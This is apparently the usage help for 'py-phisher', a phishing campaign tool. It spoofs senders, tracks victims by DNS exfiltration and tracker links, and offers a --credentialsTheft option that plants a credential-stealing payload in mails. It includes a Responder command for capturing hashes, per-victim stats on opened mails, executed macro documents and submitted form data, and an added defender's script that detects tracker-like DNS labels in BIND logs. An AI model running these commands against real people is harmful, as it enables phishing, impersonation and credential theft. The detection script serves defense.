A basic script for sending mass mail with exfiltration via DNS.
This script requires a local BIND (DNS) server and reads the BIND logs.
Do not forget to configure your domain as follows:
dig -t ANY xxx.fr
xxx.fr. 3599 IN TXT "v=spf1 mx a ip4:666.666.666.666/32 a:mail.xxx.fr ~all"
xxx.fr. 3599 IN SOA xxx.fr. postmaster.xxx.fr. 10 3600 3600 2419200 3600
xxx.fr. 3599 IN NS ns.xxx.fr.
xxx.fr. 3599 IN A 666.666.666.666
xxx.fr. 3599 IN MX 10 mail.xxx.fr.
Command-line arguments
################################################################################
Usage examples:
Interactive mode:
./py-phisher.py
Interact with previous campaign:
./py-phisher.py --campaignId=XXXXX
Manually send a campaign to ONE victim (3th1c41@1mm0r41.local), send the report to 3th1c41@1mm0r41.local and spoof evil-mailer@evildomain.fr as the sender:
./py-phisher.py --csvUsers=3th1c41@1mm0r41.local --logToEmail=3th1c41@1mm0r41.local --from=evil-mailer@evildomain.fr "--from-name=Give me your €€"
Manually send a campaign to a list of victims, send the report to 3th1c41@1mm0r41.local and spoof evil-mailer@evildomain.fr as the sender:
./py-phisher.py --csvUsers=victim.csv --logToEmail=3th1c41@1mm0r41.local --from=evil-mailer@evildomain.fr "--from-name=Give me your €€"
Create a task to send the campaign at 2018-12-31_08:30 to ONE victim (3th1c41@1mm0r41.local), send the report to 3th1c41@1mm0r41.local and spoof evil-mailer@evildomain.fr as the sender:
./py-phisher.py --csvUsers=3th1c41@1mm0r41.local --logToEmail=3th1c41@1mm0r41.local --from=evil-mailer@evildomain.fr "--from-name=Give me your €€" --sendAt=2018-12-31_08:30
--csvUsers=<email>,<email>,... or <file.csv>
# Desc: Victim or Victim list
#
# Format for <file.csv>
# email; lastname; firstname; group1; group2; group3
--logToEmail=<email>
# Desc: Send the report to <email> every day at 17h00
--from=<email>
# Desc: Phisher email
# Default: evil-mailer@evildomain.fr
--from-name=<string>
# Desc: Phisher Name
# Default: None
# Ex: to include spaces, quote the whole argument: "--from-name=1mm0r41"
--eml=<file> or <None>
# Desc: Email template to use. If omitted, an interactive session with an IMAP server is started to select a template from the "Sent" folder.
--getStats
# Desc: Get stats for a campaign. Requires --campaignId
--campaignId=<id>
# Desc: Use this arg if you want to interact with a campaign.
# Note: Campaign ID generated by Py-Phisher
--sendAt=<Date> or <None>
# Desc: Create a crontab entry to send the phishing session at the given time. If omitted, the phishing session is sent immediately.
# Format: %Y-%m-%d_%H:%M
--www=<Folder> or <None>
# Desc: The http folder for links
--client=<client name> or <None>
# Desc: The client name. It will be used in the report.
--getLastTemplate
# Desc: Get the last template from office and use it
--removeAllCron
# Desc: Remove all old py-phisher cron jobs
--credentialsTheft
# Desc: Insert a malicious payload to steal the user's credentials when the mail is opened.
Run responder on a dedicated server with the following command:
root@kali:# responder -I eth0 --lm -v -b
And do not forget to add in the DNS config:
*.responder.<domain>.fr. IN A <ip-responder>
--debugEml
# Desc: If enabled, all mails are saved to /tmp/<email>.<campaignId>
################################################################################
EML
The following fields can be used in the email and in the filename:
${DOMAIN} - Main Domain for DNS tunnel
${FROM_MAIL} - Email FROM
${FROM_NAME} - Email FROM NAME
${DEST_MAIL} - Email destination
${DEST_NAME} - Name of the destination
${CAMPAIGN_ID} - ID of the campaign
${USER_ID} - User ID
${TRACKER_LINK} - HTTP link to the form, e.g. http://poney.com/piolosputkpuoipyputlyr == http://poney.com/${TRACKER_ID}
${TRACKER_ID} - User tracker for campaign.
${TRACKER_IMG} - HTML picture used to detect whether the email has been opened
${STATS_OPEN}...${/STATS_OPEN} - If the user has already OPENED the email, the HTML between these tags is shown. If the user hasn't opened the email, this tag is removed.
${!STATS_OPEN}...${/!STATS_OPEN} - If the user hasn't OPENED the email, the HTML between these tags is shown. If the user has opened the email, this tag is removed.
${STATS_OPEN__DATA} - If the user has already OPENED the email, this tag is replaced by the date when the mail was opened.
${STATS_VBA}...${/STATS_VBA} - If the user has already OPENED the email and executed the DOCM, the HTML between these tags is shown. If the user hasn't executed the DOCM, this tag is removed.
${!STATS_VBA}...${/!STATS_VBA} - If the user has OPENED the email and NOT executed the DOCM, the HTML between these tags is shown. If the user has executed the DOCM, this tag is removed.
${STATS_VBA__DATA} - If the user has already OPENED the email and executed the DOCM, this tag is replaced by the date when the DOCM was opened.
${STATS_LINK}...${/STATS_LINK} - If the user has already OPENED the email and clicked on the HTTP link, the HTML between these tags is shown. If the user hasn't clicked on the HTTP link, this tag is removed.
${!STATS_LINK}...${/!STATS_LINK} - If the user has OPENED the email and NOT clicked on the HTTP link, the HTML between these tags is shown. If the user has clicked on the HTTP link, this tag is removed.
${STATS_VBA__LINK} - If the user has already OPENED the email and clicked on the HTTP link, this tag is replaced by the date when the HTTP link was clicked.
${STATS_FORM}...${/STATS_FORM} - If the user has already OPENED the email and filled in the form on the website, the HTML between these tags is shown. If the user hasn't filled in the form, this tag is removed.
${!STATS_FORM}...${/!STATS_FORM} - If the user has OPENED the email and NOT filled in the form on the website, the HTML between these tags is shown. If the user has filled in the form, this tag is removed.
${STATS_FORM__DATA} - If the user has already OPENED the email and filled in the form on the website, this tag is replaced by the DATA of the FORM.
${STATS_VICTIM_SAFE}...GG you haven't been pwned ...${STATS_VICTIM_SAFE} - If the user hasn't opened the malicious email, this content is shown.
${!STATS_VICTIM_SAFE}...FAIL you have been pwned ...${!STATS_VICTIM_SAFE} - If the user HAS opened the malicious email, this content is shown.
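
From the defender's side, the DNS-based tracking described at the top of this help (per-user tracker IDs under the campaign domain, read back from BIND logs) leaves a pattern in resolver query logs. The following is an added example, not part of py-phisher: it assumes tracker IDs show up as the leftmost label of queried names and that logs use the BIND query-log layout; the sample lines are constructed, and the function names and thresholds are illustrative.

```python
import math
import re
from collections import defaultdict

# Constructed BIND-style query log lines (illustrative, not a real capture).
SAMPLE_LOG = """\
31-Dec-2018 08:31:02.114 client 192.0.2.10#53211 (piolosputkpuoipyputlyr.example.test): query: piolosputkpuoipyputlyr.example.test IN A + (192.0.2.1)
31-Dec-2018 08:31:40.902 client 192.0.2.11#40112 (qzmxkvtrwhgbnpdjslfy.example.test): query: qzmxkvtrwhgbnpdjslfy.example.test IN A + (192.0.2.1)
31-Dec-2018 08:32:05.377 client 192.0.2.11#40113 (qzmxkvtrwhgbnpdjslfy.example.test): query: qzmxkvtrwhgbnpdjslfy.example.test IN A + (192.0.2.1)
31-Dec-2018 08:33:19.051 client 192.0.2.12#51877 (hwtbznqkxcvmrpldgjfs.example.test): query: hwtbznqkxcvmrpldgjfs.example.test IN A + (192.0.2.1)
31-Dec-2018 08:34:00.640 client 192.0.2.10#53290 (www.example.org): query: www.example.org IN A + (192.0.2.1)
31-Dec-2018 08:34:07.212 client 192.0.2.12#51901 (autodiscover.example.org): query: autodiscover.example.org IN A + (192.0.2.1)
"""

# Matches "client <ip>#<port> ... query: <name> IN"; newer BIND adds "@0x..." after "client".
QUERY_RE = re.compile(r"client (?:@0x[0-9a-f]+ )?([0-9a-fA-F.:]+)#\d+ .*?query: (\S+) IN ")

def entropy(s):
    """Shannon entropy of a string, in bits per character."""
    freqs = [s.count(c) / len(s) for c in set(s)]
    return -sum(p * math.log2(p) for p in freqs)

def parse_queries(log_text):
    """Yield (client_ip, queried_name) for every query line in the log."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group(1), m.group(2).rstrip(".").lower()

def suspicious_parents(log_text, min_labels=3, min_len=16, min_entropy=3.0):
    """Map parent domain -> sorted unique long, random-looking leftmost labels,
    keeping only parents that received at least min_labels distinct ones."""
    seen = defaultdict(set)
    for _client, name in parse_queries(log_text):
        labels = name.split(".")
        if len(labels) < 3:
            continue
        # Simplification: parent = last two labels (no public-suffix handling).
        label, parent = labels[0], ".".join(labels[-2:])
        if len(label) >= min_len and entropy(label) >= min_entropy:
            seen[parent].add(label)
    return {p: sorted(ls) for p, ls in seen.items() if len(ls) >= min_labels}

if __name__ == "__main__":
    for parent, ids in suspicious_parents(SAMPLE_LOG).items():
        print(f"{parent}: {len(ids)} distinct tracker-like labels -> {ids}")
```

Thresholds need tuning against a baseline of normal traffic, since CDNs and some SaaS hostnames also use long random labels.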